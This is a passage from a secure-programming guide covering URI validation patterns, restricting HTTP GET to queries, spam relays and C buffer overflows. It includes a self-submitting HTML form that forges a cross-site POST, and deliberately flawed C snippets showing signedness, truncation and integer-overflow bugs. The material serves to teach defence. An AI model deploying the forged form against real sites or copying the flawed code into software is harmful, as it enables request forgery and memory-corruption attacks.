the set of allowed schemes to just a few safe schemes.
  * Authority: Ideally, you should limit user links to ``safe'' sites, but
this is difficult to do in practice. However, you can certainly do
something about usernames, passwords, and port numbers: you should forbid
them. Systems expecting usernames (especially with passwords!) are
probably guarding more important material; rarely is this needed in
publicly-posted URIs, and someone could try to use this functionality to
convince users to expose information they have access to and/or use it to
modify the information. Such URIs permit semantic attacks; see Section
7.16 for more information. Usernames without passwords are no less
dangerous, since browsers typically cache the passwords. You should not
usually permit specification of ports, because different ports expect
different protocols and the resulting ``protocol confusion'' can produce
an exploit. For example, on some systems it's possible to use the
``gopher'' scheme and specify the SMTP (email) port to cause a user to
send email of the attacker's choosing. You might permit a few special
cases (e.g., http ports 8008 and 8080), but on the whole it's not worth
it. The host when specified by name actually has a fairly limited
character set (using the DNS standards). Technically, the standard
doesn't permit the underscore (``_'') character, but Microsoft ignored
this part of the standard and even requires the use of the underscore in
some circumstances, so you probably should allow it. Also, there's been a
great deal of work on supporting international characters in DNS names,
which is not further discussed here.
  * Path: Permitting a path is usually okay, but unfortunately some
applications use part of the path as query data, creating an opening
we'll discuss next. Also, paths are allowed to contain phrases like
``..'', which can expose private data in a poorly-written web server;
this is less a problem than it once was and really should be fixed by the
web server. Since it's only the phrase ``..'' that's special, it's
reasonable to look at paths (and possibly query data) and forbid ``../''
as a content. However, if your validator permits URL escapes, this can be
difficult; now you need to prevent versions where some of these
characters are escaped, and may also have to deal with various
``illegal'' character encodings of these characters as well.
  * Query: Query formats (beginning with "?") can be a security risk because
some query formats actually cause actions to occur on the serving end.
They shouldn't, and your applications shouldn't either; see Section 5.12
for more information. However, we have to acknowledge this reality as
a serious problem. In addition, many web sites are actually
``redirectors'' - they take a parameter specifying where the user should
be redirected, and send back a command redirecting the user to the new
location. If an attacker references such sites and provides a more
dangerous URI as the redirection value, and the browser blithely obeys
the redirection, this could be a problem. Again, the user's browser
should be more careful, but not all user browsers are sufficiently
cautious. Also, many web applications have vulnerabilities that can be
exploited with certain query values, but in general this is hard to
prevent. The official URI specifications don't sanction the ``+'' (plus)
character, but in practice the ``+'' character often represents the space
character.
  * Fragment: Fragments basically locate a portion of a document; I'm unaware
of an attack based on fragments as long as the syntax is legal, but the
legality of its syntax does need checking. Otherwise, an attacker might
be able to insert a character such as the double-quote (") and
prematurely end the URI (foiling any checking).
  * URL escapes: URL escapes are useful because they can represent arbitrary
8-bit characters; they can also be very dangerous for the same reasons.
In particular, URL escapes can represent control characters, which many
poorly-written web applications are vulnerable to. In fact, with or
without URL escapes, many web applications are vulnerable to certain
characters (such as backslash, ampersand, etc.), but again this is
difficult to generalize.
  * Relative URIs: Relative URIs should be reasonably safe (if you manage the
web site well), although in some applications there's no good reason to
allow them either.
Of course, there is a trade-off with simplicity as well. Simple patterns are
easier to understand, but they aren't very refined (so they tend to be too
permissive or too restrictive, even more than a refined pattern). Complex
patterns can be more exact, but they are more likely to have errors, require
more performance to use, and can be hard to implement in some circumstances.
Here's my suggestion for a ``simple mostly safe'' URI pattern which is very
simple and can be implemented ``by hand'' or through a regular expression;
permit the following pattern:
(http|ftp|https)://[-A-Za-z0-9._/]+
This pattern doesn't permit many potentially dangerous capabilities such as
queries, fragments, ports, or relative URIs, and it only permits a few
schemes. It prevents the use of the ``%'' character, which is used in URL
escapes and can be used to specify characters that the server may not be
prepared to handle. Since it doesn't permit either ``:'' or URL escapes, it
doesn't permit specifying port numbers, and even using it to redirect to a
more dangerous URI would be difficult (due to the lack of the escape
character). It also prevents the use of a number of other characters; again,
many poorly-designed web applications can't handle a number of ``unexpected''
characters.
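Applying the ``simple mostly safe'' pattern might look like the following Python sketch. Matching the entire string is essential; a partial match would let an attacker append arbitrary trailing content:

```python
import re

# The "simple mostly safe" URI pattern from the text above.
SIMPLE_MOSTLY_SAFE = re.compile(r"(http|ftp|https)://[-A-Za-z0-9._/]+")

def is_mostly_safe_uri(uri: str) -> bool:
    # fullmatch anchors the pattern at BOTH ends of the string.
    return SIMPLE_MOSTLY_SAFE.fullmatch(uri) is not None

assert is_mostly_safe_uri("http://www.dwheeler.com/secure-programs")
assert not is_mostly_safe_uri("javascript:alert(1)")       # bad scheme
assert not is_mostly_safe_uri("http://host:8080/")         # ":" not allowed
assert not is_mostly_safe_uri("http://host/%2e%2e/secret") # no URL escapes
```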
Even this ``mostly safe'' URI permits a number of questionable URIs, such as
subdirectories (via ``/'') and attempts to move up directories (via ``..'');
illegal queries of this kind should be caught by the server. It permits some
illegal host identifiers (e.g., ``20.20''), though I know of no case where
this would be a security weakness. Some web applications treat subdirectories
as query data (or worse, as command data); this is hard to prevent in general
since finding ``all poorly designed web applications'' is hopeless. You could
prevent the use of all paths, but this would make it impossible to reference
most Internet information. The pattern also allows references to local server
information (through patterns such as "http:///", "http://localhost/", and
"http://127.0.0.1") and access to servers on an internal network; here you'll
have to depend on the servers correctly interpreting the resulting HTTP GET
request as solely a request for information and not a request for an action,
as recommended in Section 5.12. Since query forms aren't permitted by this
pattern, in many environments this should be sufficient.
Unfortunately, the ``mostly safe'' pattern also prevents a number of quite
legitimate and useful URIs. For example, many web sites use the ``?''
character to identify specific documents (e.g., articles on a news site). The
``#'' character is useful for specifying specific sections of a document, and
permitting relative URIs can be handy in a discussion. Various permitted
characters and URL escapes aren't included in the ``mostly safe'' pattern.
For example, without permitting URL escapes, it's difficult to access many
non-English pages. If you truly need such functionality, then you can use
less safe patterns, realizing that you're exposing your users to higher risk
while giving your users greater functionality.
One pattern that permits queries, but at least limits the protocols and ports
used is the following, which I'll call the ``simple somewhat safe pattern'':
(http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
This pattern actually isn't very smart, since it permits illegal escapes,
multiple queries, queries in ftp, and so on. It does have the advantage of
being relatively simple.
Creating a ``somewhat safe'' pattern that really limits URIs to legal values
is quite difficult. Here's my current attempt to do so, which I call the
``sophisticated somewhat safe pattern'', expressed in a form where whitespace
is ignored and comments are introduced with "#":
(
(
# Handle http, https, and relative URIs:
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\?( # query:
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
(\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
|
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+ # isindex
)
))?
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)|
# Handle ftp:
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)
)
Even the sophisticated pattern shown above doesn't forbid all illegal URIs.
For example, again, "20.20" isn't a legal domain name, but it's allowed by
the pattern; however, to my knowledge this shouldn't cause any security
problems. The sophisticated pattern forbids URL escapes that represent
control characters (e.g., %00 through %1F) - the smallest permitted escape
value is %20 (ASCII space). Forbidding control characters prevents some
trouble, but it's also limiting; change "2-9" to "0-9" everywhere if you need
to support sending all control characters to arbitrary web applications. This
pattern does permit all other URL escape values in paths, which is useful for
international characters but could cause trouble for a few systems which
can't handle it. The pattern at least prevents spaces, linefeeds,
double-quotes, and other dangerous characters from being in the URI, which
prevents other kinds of attacks when incorporating the URI into a generated
document. Note that the pattern permits ``+'' in many places, since in
practice the plus is often used to replace the space character in queries and
fragments.
Unfortunately, as noted above, there are attacks which can work through any
technique that permits query data, and there don't seem to be really good
defenses for them once you permit queries. So, you could strip out the
ability to use query data from the pattern above, but permit the other forms,
producing a ``sophisticated mostly safe'' pattern:
(
(
# Handle http, https, and relative URIs:
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)|
# Handle ftp:
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)
)
As far as I can tell, as long as these patterns are only used to check
hypertext anchors selected by the user (the "<a>" tag) this approach also
prevents the insertion of ``web bugs''. Web bugs are simply text that allow
someone other than the originating web server of the main page to track
information such as who read the content and when they read it - see Section
8.7 for more information. This isn't true if you use the <img> (image) tag
with the same checking rules - the image tag is loaded immediately,
permitting someone to add a ``web bug''. Once again, this presumes that
you're not permitting any attributes; many attributes can be quite dangerous
and pierce the security you're trying to provide.
Please note that all of these patterns require that the entire URI match the
pattern. An unfortunate fact of these patterns is that they limit the
allowable patterns in a way that forbids many useful ones (e.g., they prevent
the use of new URI schemes). Also, none of them can prevent the very real
problem that some web sites perform more than queries when presented with a
query - and some of these web sites are internal to an organization. As a
result, no URI can really be safe until there are no web sites that accept
GET queries as an action (see Section 5.12). For more information about legal
URLs/URIs, see IETF RFC 2396; domain name syntax is further discussed in IETF
RFC 1034.
-----------------------------------------------------------------------------
5.11.5. Other HTML tags
You might even consider supporting more HTML tags. Obvious next choices are
the list-oriented tags, such as <ol> (ordered list), <ul> (unordered list),
and <li> (list item). However, after a certain point you're really permitting
full publishing (in which case you need to trust the provider or perform more
serious checking than will be described here). Even more importantly, every
new functionality you add creates an opportunity for error (and exploit).
One example would be permitting the <img> (image) tag with the same URI
pattern. It turns out this is substantially less safe, because this permits
third parties to insert ``web bugs'' into the document, identifying who read
the document and when. See Section 8.7 for more information on web bugs.
-----------------------------------------------------------------------------
5.11.6. Related Issues
Web applications should also explicitly specify the character set (usually
ISO-8859-1), and not permit other characters, if data from untrusted users is
being used. See Section 9.5 for more information.
Since filtering this kind of input is easy to get wrong, other alternatives
have been discussed as well. One option is to ask users to use a different
language, much simpler than HTML, that you've designed - and you give that
language very limited functionality. Another approach is parsing the HTML
into some internal ``safe'' format, and then translating that safe format
back to HTML.
Filtering can be done during input, output, or both. The CERT recommends
filtering data during the output process, just before it is rendered as part
of the dynamic page. This is because, if it is done correctly, this approach
ensures that all dynamic content is filtered. The CERT believes that
filtering on the input side is less effective because dynamic content can be
entered into a web site's database(s) via methods other than HTTP, and in this
case, the web server may never see the data as part of the input process.
Unless the filtering is implemented in all places where dynamic data is
entered, the data elements may still remain tainted.
However, I don't agree with CERT on this point for all cases. The problem is
that it's just as easy to forget to filter all the output as the input, and
allowing ``tainted'' input into your system is a disaster waiting to happen
anyway. A secure program has to filter its inputs anyway, so it's sometimes
better to include all of these checks as part of the input filtering (so that
maintainers can see what the rules really are). And finally, in some secure
programs there are many different program locations that may output a value,
but only a very few ways and locations where data can be input into it; in
such cases filtering on input may be a better idea.
-----------------------------------------------------------------------------
5.12. Forbid HTTP GET To Perform Non-Queries
Web-based applications using HTTP should prevent the use of the HTTP ``GET''
or ``HEAD'' method for anything other than queries. HTTP includes a number of
different methods; the two most popular methods used are GET and POST. Both
GET and POST can be used to transmit data from a form, but the GET method
transmits data in the URL, while the POST method transmits data separately.
The security problem of using GET to perform non-queries (such as changing
data, transferring money, or signing up for a service) is that an attacker
can create a hypertext link with a URL that includes malicious form data. If
the attacker convinces a victim to click on the link (in the case of a
hypertext link), or even just view a page (in the case of transcluded
information such as images from HTML's img tag), the victim will perform a
GET. When the GET is performed, all of the form data created by the attacker
will be sent by the victim to the link specified. This is a cross-site
malicious content attack, as discussed further in Section 7.15.
If the only action that a malicious cross-site content attack can perform is
to make the user view unexpected data, this isn't as serious a problem. This
can still be a problem, of course, since there are some attacks that can be
made using this capability. For example, there's a potential loss of privacy
due to the user requesting something unexpected, possible real-world effects
from appearing to request illegal or incriminating material, or by making the
user request the information in certain ways the information may be exposed
to an attacker in ways it normally wouldn't be exposed. However, even more
serious effects can be caused if the malicious attacker can cause not just
data viewing, but changes in data, through a cross-site link.
Typical HTTP interfaces (such as most CGI libraries) normally hide the
differences between GET and POST, since for getting data it's useful to treat
the methods ``the same way.'' However, for actions that actually cause
something other than a data query, check to see if the request is something
other than POST; if it is, simply display a filled-in form with the data
given and ask the user to confirm that they really mean the request. This
will prevent cross-site malicious content attacks, while still giving users
the convenience of confirming the action with a single click.
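A WSGI-style sketch of this advice follows; the helper names (do_action, confirmation_form) are hypothetical placeholders, not from the original document. Only a POST performs the action; a GET gets back a filled-in confirmation form, so a crafted <a href> or <img src> cannot trigger the action directly:

```python
def do_action(environ):
    return "<p>Action performed.</p>"   # placeholder for the real change

def confirmation_form(environ):
    # Re-present the submitted data and ask for one confirming click;
    # submitting this form performs the actual POST.
    return ('<form method="post" action="">'
            '<input type="submit" value="Confirm"></form>')

def handle_request(environ, start_response):
    if environ["REQUEST_METHOD"] == "POST":
        body = do_action(environ)
    else:                               # GET, HEAD, etc. stay query-only
        body = confirmation_form(environ)
    start_response("200 OK", [("Content-Type", "text/html")])
    return [body.encode("ascii")]
```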
Indeed, this behavior is strongly recommended by the HTTP specification.
According to the HTTP 1.1 specification (IETF RFC 2616 section 9.1.1), ``the
GET and HEAD methods SHOULD NOT have the significance of taking an action
other than retrieval. These methods ought to be considered "safe". This
allows user agents to represent other methods, such as POST, PUT and DELETE,
in a special way, so that the user is made aware of the fact that a possibly
unsafe action is being requested.''
In the interest of fairness, I should note that this doesn't completely solve
the problem, because on some browsers (in some configurations) scripted posts
can do the same thing. For example, imagine a web browser with ECMAscript
(Javascript) enabled receiving the following HTML snippet - on some browsers,
simply displaying this HTML snippet will automatically force the user to send
a POST request to a website chosen by the attacker, with form data defined by
the attacker:
<form action=http://remote/script.cgi method=post name=b>
<input type=hidden name=action value="do something">
<input type=submit>
</form>
<script>document.b.submit()</script>
My thanks to David deVitry for pointing this out. However, although this advice
doesn't solve all problems, it's still worth doing. In part, this is because
the remaining problem can be solved by smarter web browsers (e.g., by always
confirming the data before allowing ECMAscript to send a web form) or by web
browser configuration (e.g., disabling ECMAscript). Also, this attack doesn't
work in many cross-site scripting exploits, because many websites don't allow
users to post ``script'' commands but do allow arbitrary URL links. Thus,
limiting the actions a GET command can perform to queries significantly
improves web application security.
-----------------------------------------------------------------------------
5.13. Counter SPAM
Any program that can send email elsewhere, by request from the network, can
be used to transport spam. Spam is the usual name for unsolicited bulk email
(UBE) or mass unsolicited email. It's also sometimes called unsolicited
commercial email (UCE), though that name is misleading - not all spam is
commercial. For a discussion of why spam is such a serious problem and more
general discussion about it, see my essay at [http://www.dwheeler.com/essays/
stopspam.html] http://www.dwheeler.com/essays/stopspam.html, as well as
[http://mail-abuse.org/] http://mail-abuse.org/, [http://spam.abuse.net/]
http://spam.abuse.net/, [http://www.cauce.org/] CAUCE, and [http://
www.faqs.org/rfcs/rfc2635.html] IETF RFC 2635. Spam receivers and
intermediaries bear most of the cost of spam, while the spammer spends very
little to send it. Therefore many people regard spam as a theft of service,
not just some harmless activity, and that number increases as the amount of
spam increases.
If your program can be used to generate email sent to others (such as a mail
transfer agent, generator of data sent by email, or a mailing list manager),
be sure to write your program to prevent its unauthorized use as a mail
relay. A program should usually only allow legitimate authorized users to
send email to others (e.g., those inside that company's mail server or those
legitimately subscribed to the service). More information about this is in
[http://www.faqs.org/rfcs/rfc2505.html] IETF RFC 2505. Also, if you manage a
mailing list, make sure that it can enforce the rule that only subscribers
can post to the list, and create a ``log in'' feature that will make it
somewhat harder for spammers to subscribe, spam, and unsubscribe easily.
One way to more directly counter SPAM is to incorporate support for the MAPS
(Mail Abuse Prevention System LLC) RBL (Realtime Blackhole List), which
maintains in real-time a list of IP addresses where SPAM is known to
originate. For more information, see [http://mail-abuse.org/rbl/] http://
mail-abuse.org/rbl/. Many current Mail Transfer Agents (MTAs) already support
the RBL; see their websites for how to configure them. The usual way to use
the RBL is to simply refuse to accept any requests from IP addresses in the
blackhole list; this is harsh, but it solves the problem. Another similar
service is the Open Relay Database (ORDB) at [http://ordb.org] http://
ordb.org, which identifies dynamically those sites that permit open email
relays (open email relays are misconfigured email servers that allow spammers
to send email through them). Another location for more information is [http:/
/www.spews.org] SPEWS. I believe there are other similar services as well.
I suggest that many systems and programs, by default, enable spam blocking if
they can send email on to others whose identity is under control of a remote
user - and that includes MTAs. At the least, consider this. There are real
problems with this suggestion, of course - you might (rarely) inhibit
communication with a legitimate user. On the other hand, if you don't block
spam, then it's likely that everyone else will blackhole your system (and
thus ignore your emails). It's not a simple issue, because no matter what you
do, some people will not allow you to send them email. And of course, how
well do you trust the organization keeping up the real-time blackhole list -
will they add truly innocent sites to the blackhole list, and will they
remove sites from the blackhole list once all is okay? Thus, it becomes a
trade-off - is it more important to talk to spammers (and a few innocents as
well), or is it more important to talk to those many other systems with spam
blocks (losing those innocents who share equipment with spammers)? Obviously,
this must be configurable. This is somewhat controversial advice, so consider
your options for your circumstance.
-----------------------------------------------------------------------------
5.14. Limit Valid Input Time and Load Level
Place time-outs and load level limits, especially on incoming network data.
Otherwise, an attacker might be able to easily cause a denial of service by
constantly requesting the service.
-----------------------------------------------------------------------------
Chapter 6. Avoid Buffer Overflow
  An enemy will overrun the land; he
  will pull down your strongholds and
  plunder your fortresses.
    Amos 3:11 (NIV)
An extremely common security flaw is vulnerability to a ``buffer overflow''.
Buffer overflows are also called ``buffer overruns'', and there are many
kinds of buffer overflow attacks (including ``stack smashing'' and ``heap
smashing'' attacks). Technically, a buffer overflow is a problem with the
program's internal implementation, but it's such a common and serious problem
that I've placed this information in its own chapter. To give you an idea of
how important this subject is, at the CERT, 9 of 13 advisories in 1998 and at
least half of the 1999 advisories involved buffer overflows. An informal 1999
survey on Bugtraq found that approximately 2/3 of the respondents felt that
buffer overflows were the leading cause of system security vulnerability (the
remaining respondents identified ``mis-configuration'' as the leading cause)
[Cowan 1999]. This is an old, well-known problem, yet it continues to
resurface [McGraw 2000].
A buffer overflow occurs when you write a set of values (usually a string of
characters) into a fixed length buffer and write at least one value outside
that buffer's boundaries (usually past its end). A buffer overflow can occur
when reading input from the user into a buffer, but it can also occur during
other kinds of processing in a program.
If a secure program permits a buffer overflow, the overflow can often be
exploited by an adversary. If the buffer is a local C variable, the overflow
can be used to force the function to run code of an attacker's choosing. This
specific variation is often called a ``stack smashing'' attack. A buffer in
the heap isn't much better; attackers may be able to use such overflows to
control other variables in the program. More details can be found from Aleph1
[1996], Mudge [1995], LSD [2001], or Nathan P. Smith's "Stack Smashing
Security Vulnerabilities" website at [http://destroy.net/machines/security/]
http://destroy.net/machines/security/. A discussion of the problem and some
ways to counter them is given by Crispin Cowan et al, 2000, at [http://
immunix.org/StackGuard/discex00.pdf] http://immunix.org/StackGuard/
discex00.pdf. A discussion of the problem and some ways to counter them in
Linux is given by Pierre-Alain Fayolle and Vincent Glaume at [http://
www.enseirb.fr/~glaume/indexen.html] http://www.enseirb.fr/~glaume/
indexen.html.
Most high-level programming languages are essentially immune to this problem,
either because they automatically resize arrays (e.g., Perl), or because they
normally detect and prevent buffer overflows (e.g., Ada95). However, the C
language provides no protection against such problems, and C++ can be easily
used in ways to cause this problem too. Assembly language also provides no
protection, and some languages that normally include such protection (e.g.,
Ada and Pascal) can have this protection disabled (for performance reasons).
Even if most of your program is written in another language, many library
routines are written in C or C++, as well as ``glue'' code to call them, so
other languages often don't provide as complete a protection from buffer
overflows as you'd like.
-----------------------------------------------------------------------------
6.1. Dangers in C/C++
C users must avoid using dangerous functions that do not check bounds unless
they've ensured that the bounds will never get exceeded. Functions to avoid
in most cases (or ensure protection) include the functions strcpy(3), strcat
(3), sprintf(3) (with cousin vsprintf(3)), and gets(3). These should be
replaced with functions such as strncpy(3), strncat(3), snprintf(3), and
fgets(3) respectively, but see the discussion below. The function strlen(3)
should be avoided unless you can ensure that there will be a terminating NIL
character to find. The scanf() family (scanf(3), fscanf(3), sscanf(3), vscanf
(3), vsscanf(3), and vfscanf(3)) is often dangerous to use; do not use it to
send data to a string without controlling the maximum length (the format %s
is a particularly common problem). Other dangerous functions that may permit
buffer overruns (depending on their use) include realpath(3), getopt(3),
getpass(3), streadd(3), strecpy(3), and strtrns(3). You must be careful with
getwd(3); the buffer sent to getwd(3) must be at least PATH_MAX bytes long.
The select(2) helper macros FD_SET(), FD_CLR(), and FD_ISSET() do not check
that the index fd is within bounds; make sure that fd >= 0 and fd <
FD_SETSIZE (this particular one has been exploited in pppd).
Unfortunately, snprintf()'s variants have additional problems. Officially,
snprintf() is not a standard C function in the ISO 1990 (ANSI 1989) standard,
though sprintf() is, so not all systems include snprintf(). Even worse, some
systems' snprintf() do not actually protect against buffer overflows; they
just call sprintf directly. Old versions of Linux's libc4 depended on a
``libbsd'' that did this horrible thing, and I'm told that some old HP
systems did the same. Linux's current version of snprintf is known to work
correctly, that is, it does actually respect the boundary requested. The
return value of snprintf() varies as well; the Single Unix Specification
(SUS) version 2 and the C99 standard differ on what is returned by snprintf
(). Finally, it appears that at least some versions of snprintf don't
guarantee that its string will end in NIL; if the string is too long, it
won't include NIL at all. Note that the glib library (the basis of GTK, and
not the same as the GNU C library glibc) has a g_snprintf(), which has a
consistent return semantic, always NIL-terminates, and most importantly
always respects the buffer length.
Of course, the problem is more than just calling string functions poorly.
Here are a few additional examples of types of buffer overflow problems,
graciously suggested by Timo Sirainen, involving manipulation of numbers to
cause buffer overflows.
First, there's the problem of signedness. If you read data that affects the
buffer size, such as the "number of characters to be read," be sure to check
if the number is less than zero or one. Otherwise, the negative number may be
cast to an unsigned number, and the resulting large positive number may then
permit a buffer overflow problem. Note that sometimes an attacker can provide
a large positive number and have the same thing happen; in some cases, the
large value will be interpreted as a negative number (slipping by the check
for large numbers if there's no check for a less-than-one value), and then be
interpreted later into a large positive value.
/* 1) signedness - DO NOT DO THIS. */
char *buf;
int i, len;
read(fd, &len, sizeof(len));
/* OOPS! We forgot to check for < 0 */
if (len > 8000) { error("too large length"); return; }
buf = malloc(len);
read(fd, buf, len); /* len cast to unsigned and overflows */
Here's a second example identified by Timo Sirainen, involving integer size
truncation. Sometimes the different sizes of integers can be exploited to
cause a buffer overflow. Basically, make sure that you don't truncate any
integer results used to compute buffer sizes. Here's Timo's example for
64-bit architectures:
/* An example of an ERROR for some 64-bit architectures,
if "unsigned int" is 32 bits and "size_t" is 64 bits: */
void *mymalloc(unsigned int size) { return malloc(size); }
char *buf;
size_t len;
read(fd, &len, sizeof(len));
/* we forgot to check the maximum length */
/* 64-bit size_t gets truncated to 32-bit unsigned int */
buf = mymalloc(len);
read(fd, buf, len);
Here's a third example from Timo Sirainen, involving integer overflow. This
is particularly nasty when combined with malloc(); an attacker may be able to
create a situation where the computed buffer size is less than the data to be
placed in it. Here is Timo's sample:
/* 3) integer overflow */
char *buf;
size_t len;
read(fd, &len, sizeof(len));
/* we forgot to check the maximum length */
buf = malloc(len+1); /* +1 can overflow to malloc(0) */
read(fd, buf, len);
buf[len] = '\0';
-----------------------------------------------------------------------------
6.2. Library Solutions in C/C++
One partial solution in C/C++ is to use library functions that do not have
buffer overflow problems. The first subsection describes the ``standard C
library'' solution, which can work but has its disadvantages. The next
subsection describes the general security issues of both fixed length and
dynamically reallocated approaches to buffers. The following subsections
describe various alternative libraries, such as strlcpy and libmib. Note that
these don't solve all problems; you still have to code extremely carefully in
C/C++ to avoid all buffer overflow situations.
-----------------------------------------------------------------------------
6.2.1. Standard C Library Solution
The ``standard'' solution to prevent buffer overflow in C (which is also used
in some C++ programs) is to use the standard C library calls that defend
against these problems. This approach depends heavily on the standard library
functions strncpy(3) and strncat(3). If you choose this approach, beware:
these calls have somewhat surprising semantics and are hard to use correctly.
The function strncpy(3) does not NIL-terminate the destination string if the
source string length is at least equal to the destination's, so be sure to
set the last character of the destination string to NIL after calling strncpy
(3). If you're going to reuse the same buffer many times, an efficient
approach is to tell strncpy() that the buffer is one character shorter than
it actually is and set the last character to NIL once before use. Both
strncpy(3) and strncat(3) require that you pass the amount of space left
available, a computation that is easy to get wrong (and getting it wrong
could permit a buffer overflow attack). Neither provide a simple mechanism to
determine if an overflow has occurred. Finally, strncpy(3) has a significant
performance penalty compared to the strcpy(3) it supposedly replaces, because
strncpy(3) NIL-fills the remainder of the destination. I've gotten emails
expressing surprise over this last point, but this is clearly stated in
Kernighan and Ritchie second edition [Kernighan 1988, page 249], and this
behavior is clearly documented in the man pages for Linux, FreeBSD, and
Solaris. This means that just changing from strcpy to strncpy can cause a
severe reduction in performance, for no good reason in most cases.
Warning!! The function strncpy(s1, s2, n) can also be used as a way of
copying only part of s2, where n is less than strlen(s2). When used this way,
strncpy() basically provides no protection against buffer overflow by itself
- you have to take separate actions to ensure that n is smaller than the
buffer of s1. Also, when used this way, strncpy() does not usually add a
trailing NIL after copying n characters. This makes it harder to determine if
a program using strncpy() is secure.
You can also use sprintf() while preventing buffer overflows, but you need to
be careful when doing so; it's so easy to misapply that it's hard to
recommend. The sprintf control string can contain various conversion
specifiers (e.g., "%s"), and the control specifiers can have optional field
width (e.g., "%10s") and precision (e.g., "%.10s") specifications. These look
quite similar (the only difference is a period) but they are very different.
The field width only specifies a minimum length and is completely worthless
for preventing buffer overflows. In contrast, the precision specification
specifies the maximum length that that particular string may have in its
output when used as a string conversion specifier - and thus it can be used
to protect against buffer overflows. Note that the precision specification
only specifies the total maximum length when dealing with a string; it has a
different meaning for other conversion operations. If the size is given as a
precision of "*", then you can pass the maximum size as a parameter (e.g.,
the result of a sizeof() operation). This is most easily shown by an example
- here's the wrong and right way to use sprintf() to protect against buffer
overflows:
char buf[BUFFER_SIZE];
sprintf(buf, "%*s",  (int)(sizeof(buf)-1), "long-string"); /* WRONG */
sprintf(buf, "%.*s", (int)(sizeof(buf)-1), "long-string"); /* RIGHT */
In theory, sprintf() should be very helpful because you can use it to specify
complex formats. Sadly, it's easy to get things wrong with sprintf(). If the
format is complex, you need to make sure that the destination is large enough
for the largest possible size of the entire format, but the precision field
only controls the size of one parameter. The "largest possible" value is
often hard to determine when a complicated output is being created. If a
program doesn't allocate quite enough space for the longest possible
combination, a buffer overflow vulnerability may open up. Also, sprintf()
appends a NUL to the destination after the entire operation is complete -
this extra character is easy to forget and creates an opportunity for
off-by-one errors. So, while this works, it can be painful to use in some
circumstances.
Also, a quick note about the code above - note that the sizeof() operation
used the size of an array. If the code were changed so that ``buf'' was a
pointer to some allocated memory, then all ``sizeof()'' operations would have
to be changed (or sizeof would just measure the size of a pointer, which
isn't enough space for most values).
The scanf() family is sadly a little murky as well. An obvious question is
whether or not the maximum width value can be used in %s to prevent these
attacks. There are multiple official specifications for scanf(); some clearly
state that the width parameter is the absolutely largest number of
characters, while others aren't as clear. The biggest problem is
implementations; modern implementations that I know of do support maximum
widths, but I cannot say with certainty that all libraries properly implement
maximum widths. The safest approach is to do things yourself in such cases.
However, few will fault you if you simply use scanf and include the widths in
the format strings (but don't forget to count \0, or you'll get the wrong
length). If you do use scanf, it's best to include a test in your
installation scripts to ensure that the library properly limits length.
-----------------------------------------------------------------------------
6.2.2. Static and Dynamically Allocated Buffers
Functions such as strncpy are useful for dealing with statically allocated
buffers. This is a programming approach where a buffer is allocated for the
``longest useful size'' and then it stays a fixed size from then on. The
alternative is to dynamically reallocate buffer sizes as you need them. It
turns out that both approaches have security implications.
There is a general security problem when using fixed-length buffers: the fact
that the buffer is a fixed length may be exploitable. This is a problem with
strncpy(3) and strncat(3), snprintf(3), strlcpy(3), strlcat(3), and other
such functions. The basic idea is that the attacker sets up a really long
string so that, when the string is truncated, the final result will be what
the attacker wanted (instead of what the developer intended). Perhaps the
string is catenated from several smaller pieces; the attacker might make the
first piece as long as the entire buffer, so all later attempts to
concatenate strings do nothing. Here are some specific examples:
  * Imagine code that calls gethostbyname(3) and, if successful, immediately
copies hostent->h_name to a fixed-size buffer using strncpy or snprintf.
Using strncpy or snprintf protects against an overflow of an excessively
long fully-qualified domain name (FQDN), so you might think you're done.
However, this could result in chopping off the end of the FQDN. This may
be very undesirable, depending on what happens next.
  * Imagine code that uses strncpy, strncat, snprintf, etc., to copy the full
path of a filesystem object to some buffer. Further imagine that the
original value was provided by an untrusted user, and that the copying is
part of a process to pass a resulting computation to a function. Sounds
safe, right? Now imagine that an attacker pads a path with a large number
of '/'s at the beginning. This could result in future operations being
performed on the file ``/''. If the program appends values in the belief
that the result will be safe, the program may be exploitable. Or, the
attacker could devise a long filename near the buffer length, so that
attempts to append to the filename would silently fail to occur (or only
partially occur in ways that may be exploitable).
When using statically-allocated buffers, you really need to consider the
